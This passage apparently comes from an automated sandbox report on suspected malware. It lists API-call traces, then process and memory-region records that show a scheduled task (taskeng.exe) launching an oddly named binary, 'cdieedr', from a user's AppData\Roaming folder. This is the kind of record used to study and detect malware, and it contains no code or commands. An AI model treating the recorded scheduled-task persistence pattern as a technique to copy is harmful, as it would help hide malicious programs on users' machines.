(lpEnumFunc=0x2753dd0, lParam=0x2580000) [0176.676] Sleep (dwMilliseconds=0x64) [0176.787] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0182.106] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) returned 1 [0182.144] Sleep (dwMilliseconds=0x64) [0182.259] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0187.548] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0195.160] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) returned 1 [0195.201] Sleep (dwMilliseconds=0x64) [0195.306] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0220.467] Sleep (dwMilliseconds=0x64) [0220.603] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0227.597] Sleep (dwMilliseconds=0x64) [0227.717] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0232.693] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0238.247] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0246.082] Sleep (dwMilliseconds=0x64) [0246.191] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0258.669] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0265.378] Sleep (dwMilliseconds=0x64) [0265.484] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0272.848] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) Thread: id = 122 os_tid = 0xf8c Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x3a0d3000" os_pid = "0xef4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x360" cmd_line = "taskeng.exe {1502D5E7-18A7-4E91-B5C6-7A72D95744FD} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1113 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1114 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1115 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1116 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1117 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1118 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1119 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1120 start_va = 0xff8e0000 end_va = 0xff953fff monitored = 0 entry_point = 0xff8ef44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1121 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1122 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1123 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1124 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1125 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1126 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1127 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1128 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1129 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1130 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1131 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1132 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1133 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1134 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1135 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1136 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1137 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1138 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1139 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1140 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1141 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1142 start_va = 0x260000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1143 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1144 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1145 start_va = 0x360000 end_va = 0x388fff monitored = 0 entry_point = 0x361010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1146 start_va = 0x3b0000 end_va = 0x537fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1147 start_va = 0x360000 end_va = 0x388fff monitored = 0 entry_point = 0x361010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1148 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1149 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1150 start_va = 0x540000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1151 start_va = 0x6d0000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1152 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1153 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1154 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1155 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 1156 start_va = 0x1ad0000 end_va = 0x1b4cfff monitored = 0 entry_point = 0x1adcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1157 start_va = 0x1b70000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1158 start_va = 0x1ad0000 end_va = 0x1b4cfff monitored = 0 entry_point = 0x1adcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1159 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1160 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1161 start_va = 0x1da0000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 1162 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1163 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1164 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1165 start_va = 0x1ad0000 end_va = 0x1b14fff monitored = 0 entry_point = 0x1ad1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1166 start_va = 0x1ad0000 end_va = 0x1b14fff monitored = 0 entry_point = 0x1ad1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1167 start_va = 0x1ad0000 end_va = 0x1b14fff monitored = 0 entry_point = 0x1ad1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1168 start_va = 0x1ad0000 end_va = 0x1b14fff monitored = 0 entry_point = 0x1ad1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1169 start_va = 0x1ad0000 end_va = 0x1b14fff monitored = 0 entry_point = 0x1ad1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1170 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1171 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1172 start_va = 0x1ca0000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 1173 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1174 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1175 start_va = 0x1e20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1176 start_va = 0x2060000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1177 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1178 start_va = 0x20e0000 end_va = 0x23aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1179 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1180 start_va = 0x1fa0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1181 start_va = 0x2440000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 1182 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1183 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1184 start_va = 0x360000 end_va = 0x360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 1185 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1186 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1193 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1194 start_va = 0x1bf0000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1195 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1196 start_va = 0x24c0000 end_va = 0x259efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 1197 start_va = 0x2610000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 1198 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1199 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 42 os_tid = 0xef8 Thread: id = 43 os_tid = 0xefc Thread: id = 44 os_tid = 0xf00 Thread: id = 45 os_tid = 0xf04 Thread: id = 46 os_tid = 0xf08 Thread: id = 47 os_tid = 0xf0c Thread: id = 49 os_tid = 0xf14 Process: id = "5" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0x3c4fa000" os_pid = "0xf18" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xef4" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1553 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1554 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1555 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1556 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1557 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1558 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1559 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x403410 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 1560 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1561 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1562 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1563 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1564 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1565 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1566 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1567 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1568 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1573 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1574 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1575 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1576 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1577 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1578 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1579 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1580 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1581 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1582 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1583 start_va = 0x260000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1584 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1585 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1586 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1587 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1588 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1589 start_va = 0x450000 end_va = 0x4b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1590 start_va = 0x4c0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1607 start_va = 0x20000 end_va = 0x28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1608 start_va = 0x5b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1609 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1610 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1611 start_va = 0x30000 end_va = 0x38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1612 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1613 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1614 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1615 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1616 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1617 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1618 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1619 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type 